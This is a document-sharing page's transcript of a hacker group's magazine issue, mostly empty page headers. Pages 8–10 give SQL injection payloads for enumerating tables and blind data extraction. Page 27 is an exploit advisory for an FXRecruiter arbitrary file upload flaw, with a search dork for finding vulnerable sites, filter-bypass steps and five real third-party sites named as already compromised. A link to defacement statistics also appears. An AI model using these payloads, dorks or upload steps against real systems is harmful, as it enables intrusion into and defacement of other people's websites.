+ All Categories
Home > Documents > - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane...

- Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane...

Date post: 05-Apr-2020
Category:

Documents
Upload: others
View: 0 times
Download: 0 times
Download Report this document
Share this document with a friend
34
Transcript
Page 1: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability
Page 2: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability

www.ashiyane.org

http://www.ashiyane.org
Page 3: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability

Ashiyane Digital Security Team

Page 4: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability

Ashiyane Digital Security Team

Page 5: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability

Ashiyane Digital Security Team

Page 6: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability

Ashiyane Digital Security Team

Page 7: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability

Ashiyane Digital Security Team

Page 8: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability

Ashiyane Digital Security Team

www.site.com/news.asp?id=@@Version

www.site.com/news.asp?id=(Select Name

From SysObject Where Xtype=’U’)

Microsoft OLE DB Provider for ODBC Driverserror ‘80004005’

[Microsoft][ODBC SQL Server Driver][SQLServer]Subquery returned more than 1 value.This is not permitted when the subqueryfollows =, !=, <, <= , >, >= or when thesubquery is used as an expression

Select Top 1 Name From SysObjects Where

Xtype=’U’

http://www.site.com/news.asp?id=@@Version
http://www.site.com/news.asp?id=(Select
Page 9: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability

Ashiyane Digital Security Team

news.asp?id=(Select Top 1 Name From

SysObject Where Xtype=’U’ And Name Not In

(‘User’))

www.site.com/news.asp?id=2 Having 1=1

Microsoft OLE DB Provider for ODBC Driverserror ‘80040e14’

[Microsoft][ODBC SQL Server Driver][SQLServer]Column ‘dbo. MeetingDetails.id ‘ isinvalid in the select list because it is notcontained in an aggregate function and thereis no GROUP BY clause.

www.site.com/news.asp?id=2 Group By id

Having 1=1www.site.com/news.asp?id=5 And

SubString(@@version,1,1)=5

www.site.com/news.asp?id=5 And 5=5

http://www.site.com/news.asp?id=2
http://www.site.com/news.asp?id=2
http://www.site.com/news.asp?id=5
http://www.site.com/news.asp?id=5
Page 10: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability

Ashiyane Digital Security Team

news.asp?id=5 And (Select SubString

(Concat(1,Column-name),1,1)FRom

Table_Name Limit 0,1)=1

<And ascii (SubString((Select

Concat(Column_Name) From Table_Name

Limit 0,1),1,1))><Char

And ascii (SubString((Select

Concat(User_Name) From Users Limit

0,1),1,1)) > 98

news.asp?id=5 And ( Select 1 From

Table_Name Limit 0,1)=1

Page 11: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability

Ashiyane Digital Security Team

Page 12: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability

Ashiyane Digital Security Team

Page 13: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability

Ashiyane Digital Security Team

Page 14: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability

Ashiyane Digital Security Team

Page 15: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability

Ashiyane Digital Security Team

Page 16: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability

Ashiyane Digital Security Team

Page 17: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability

Ashiyane Digital Security Team

http://cloud.github.com/downloads/easyphp/easyphp/EasyPHP-5.3.6.0-setup.exe

http://cloud.github.com/downloads/easyphp/
Page 18: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability

Ashiyane Digital Security Team

Page 19: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability

Ashiyane Digital Security Team

Page 20: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability

Ashiyane Digital Security Team

www.wampserver.com/en/

mysql , mssql , oracle , msql , postgresql

http://www.wampserver.com/en/
Page 21: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability

Ashiyane Digital Security Team

Page 22: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability

Ashiyane Digital Security Team

Page 23: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability

Ashiyane Digital Security Team

Page 24: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability

Ashiyane Digital Security Team

Page 25: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability

Ashiyane Digital Security Team

Page 26: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability

Ashiyane Digital Security Team

Page 27: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability

Ashiyane Digital Security Team

=======================================================================# FXRecruiter Arbitary File Upload Vulnerability=======================================================================# Name: FXRecruiter Arbitary File Upload Vulnerability

# Vendor: http://www.fxrecruiter.co.uk & http://www.reversedelta.com

# Risk: High

# Date: 2011-03-27

# Author: Ashiyane Digital Security Team

# Contact: XroGuE_p3rsi4n_hack3r[at]Hotmail[Dot]com

# Home: www.Ashiyane.org/forums/

# Gr33tz: Behrooz_Ice,Virangar,And All Ashiyane Members !

==========================================================================

[+] Dork: intext:”Powered by FXRecruiter” & inurl:”page.php?page=*.php”

==========================================================================[+] Note : You must Register at site, Then in “Upload CV Field” Select and

[-] Upload Your File, then Using “Live Http Header” Change ur File Format To Etc ...

[+] Uploaded path: http://127.0.0.1/fxmodules/resumes/[Your File].*

[+] Demo1: http://www.resourcing-solutions.com/fxmodules/resumes/haha_ehehe.html

[+] Demo2: http://www.energyintoenergy.com/fxmodules/resumes/p3rsi4n_hack3r_xrogue1.html

[+] Demo3: http://peoplemarketing.co.uk/fxmodules/resumes/black_xrogue.html

[+] Demo4: http://www.charles-hunter.com/fxmodules/resumes/black_hat_xrogue.html

[+] Demo5: http://www.activesolutionsrecruitment.com/fxmodules/resumes/black_hat_xrogue.html==========================================================================

# Why I Put 5 Demo Site ????

* For Some People That Think my Report’s Is Fake or not AVAILABLE At Net... !!! :-l

$ Need Live Video ??? : ~>

Video : http://www.vimeo.com/21464321

Video http://www.4shared.com/file/AIwSyKn-/FXRecruiter_Arbitary_File_Uplo.html

==========================================================================[+] Taghdim be Baxe Ashiyane, Happy New Year... omidVaram Sale KHoobi dashte bashin ![+] Discovered By XroGuE !!!

BUG

http://www.fxrecruiter.co.uk
http://www.reversedelta.com
http://www.Ashiyane.org/forums/
http://127.0.0.1/fxmodules/resumes/
http://www.resourcing-solutions.com/fxmodules/resumes/haha_ehehe.html
http://www.energyintoenergy.com/fxmodules/resumes/p3rsi4n_hack3r_xrogue1.html
http://peoplemarketing.co.uk/fxmodules/resumes/black_xrogue.html
http://www.charles-hunter.com/fxmodules/resumes/black_hat_xrogue.html
http://www.activesolutionsrecruitment.com/fxmodules/resumes/
http://www.vimeo.com/21464321
http://www.4shared.com/file/AIwSyKn-/FXRecruiter_Arbitary_File_Uplo.html
Page 28: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability

Ashiyane Digital Security Team

Zone-HZone-H

http://zone-h.org/stats/notifierspecial

http://zone-h.org/stats/notifierspecial
Page 29: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability

Ashiyane Digital Security Team

Page 30: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability

Ashiyane Digital Security Team

Page 31: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability

Ashiyane Digital Security Team

Page 32: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability

Ashiyane Digital Security Team

Page 33: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability

Ashiyane Digital Security Team

Page 34: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability

Recommended
PNF - Zanjan University of Medical Scienceszums.ac.ir › journal › article-1-5096-fa.pdf · The Effect of 12 Weeks Combined (Strength, Endurance, Pilates, PNF) Exercise Training

PNF - Zanjan University of Medical Scienceszums.ac.ir › journal › article-1-5096-fa.pdf · The Effect of 12 Weeks Combined (Strength, Endurance, Pilates, PNF) Exercise Training

Documents

Direct Growth of Graphene Film on Germanium Substrate · 2014. 8. 6. · graphene growth on arbitary surfaces, especially on semiconductor materials in order to promote better com-patibility

Direct Growth of Graphene Film on Germanium Substrate · 2014. 8. 6. · graphene growth on arbitary surfaces, especially on semiconductor materials in order to promote better com-patibility

Documents

 · Repair and service of ABB RTU560 Assaluyeh Automation system of Damavand petrochemical Substation using Siemens brand Fars Gilan Zanjan Khoozestan Caspian

 · Repair and service of ABB RTU560 Assaluyeh Automation system of Damavand petrochemical Substation using Siemens brand Fars Gilan Zanjan Khoozestan Caspian

Documents

Central Venous Catheters - Zanjan University of Medical …zums.ac.ir/files/Treatment/pages/iv_cathet… · PPT file · Web view · 2010-06-24Acute and chronic complications are

Central Venous Catheters - Zanjan University of Medical …zums.ac.ir/files/Treatment/pages/iv_cathet… · PPT file · Web view · 2010-06-24Acute and chronic complications are

Documents

RESEARCH SUMMARY - uni-hamburg.de · classes [15, 16] – differential trivializations of arbitary universal characteristic classes. We re-cover the canonical 3-forms [13] that are

RESEARCH SUMMARY - uni-hamburg.de · classes [15, 16] – differential trivializations of arbitary universal characteristic classes. We re-cover the canonical 3-forms [13] that are

Documents

AcrAB - Zanjan University of Medical Scienceszums.ac.ir/journal/article-1-5046-fa.pdf · Background and Objective: One of the mechanisms involved in the resistance of Klebsiella pneumoniae

AcrAB - Zanjan University of Medical Scienceszums.ac.ir/journal/article-1-5046-fa.pdf · Background and Objective: One of the mechanisms involved in the resistance of Klebsiella pneumoniae

Documents

NICU ICU - Zanjan University of Medical Scienceszums.ac.ir/files/emdadi/pages/archive/history.pdf · 3| Page Ct scan CCU-ICU EEG NICU TUR Accredits Of Hospital NICU ICU CCU UNICEF

NICU ICU - Zanjan University of Medical Scienceszums.ac.ir/files/emdadi/pages/archive/history.pdf · 3| Page Ct scan CCU-ICU EEG NICU TUR Accredits Of Hospital NICU ICU CCU UNICEF

Documents

Journal of Sciences, Islamic Republic of Iran - Sedimentary … · 2021. 2. 13. · 3Department of Geology, Faculty of Science, University of Zanjan, Zanjan, Islamic Republic of Iran

Journal of Sciences, Islamic Republic of Iran - Sedimentary … · 2021. 2. 13. · 3Department of Geology, Faculty of Science, University of Zanjan, Zanjan, Islamic Republic of Iran

Documents

Invest in Liepaja - LIAA · Investment proposal Invest in Liepaja. Andorra Armenia Austria ... A rak Q Zanjan Qazvin Kermanshah ... 4 Invest in Liepaja

Invest in Liepaja - LIAA · Investment proposal Invest in Liepaja. Andorra Armenia Austria ... A rak Q Zanjan Qazvin Kermanshah ... 4 Invest in Liepaja

Documents

Martin Waldseemüller's World Map of 1507 Zanjan. Roberto Todeschini Viviana Consonni Davide Ballabio Andrea Mauri Alberto Manganaro chemometrics molecular.

Martin Waldseemüller's World Map of 1507 Zanjan. Roberto Todeschini Viviana Consonni Davide Ballabio Andrea Mauri Alberto Manganaro chemometrics molecular.

Documents

Airborne gravimetry: An Introduction Madjid ABBASI Surveying Engineering Department, Zanjan University, Zanjan, Iran National Cartographic Center (NCC)

Airborne gravimetry: An Introduction Madjid ABBASI Surveying Engineering Department, Zanjan University, Zanjan, Iran National Cartographic Center (NCC)

Documents

Noise Reduction during embryonic development. STATPHYS 22 Satellite Meeting, Zanjan June 27- July 1.

Noise Reduction during embryonic development. STATPHYS 22 Satellite Meeting, Zanjan June 27- July 1.

Documents

This page intentionally left blank - Zanjan University of ...file.zums.ac.ir/ebook/100-An Introduction to Atmospheric Physics... · 3 Atmospheric radiation 52 ... that a balanced

This page intentionally left blank - Zanjan University of ...file.zums.ac.ir/ebook/100-An Introduction to Atmospheric Physics... · 3 Atmospheric radiation 52 ... that a balanced

Documents

4 Th Iranian chemometrics Workshop (ICW) Zanjan-2004

4 Th Iranian chemometrics Workshop (ICW) Zanjan-2004

Documents

Zanjan University of Medical Scienceszums.ac.ir/journal/article-1-685-fa.pdf · kinase H.Purification of M2-type pyruvate kinase from Yoshida ascites hepatoma 130 cells and comparative

Zanjan University of Medical Scienceszums.ac.ir/journal/article-1-685-fa.pdf · kinase H.Purification of M2-type pyruvate kinase from Yoshida ascites hepatoma 130 cells and comparative

Documents

Financial Econometrics - With Eviews - Zanjan University of

Financial Econometrics - With Eviews - Zanjan University of

Documents

Drug Delivery Systems - Zanjan University of Medical Sciences

Drug Delivery Systems - Zanjan University of Medical Sciences

Documents

DEVELOPMENT OF A STRATEGIC MANAGEMENT … ISSN1452-4864/11_1_2016_May_1_148... · DEVELOPMENT OF A STRATEGIC MANAGEMENT TOOL IN A ... construction project located in city of Zanjan,

DEVELOPMENT OF A STRATEGIC MANAGEMENT … ISSN1452-4864/11_1_2016_May_1_148... · DEVELOPMENT OF A STRATEGIC MANAGEMENT TOOL IN A ... construction project located in city of Zanjan,

Documents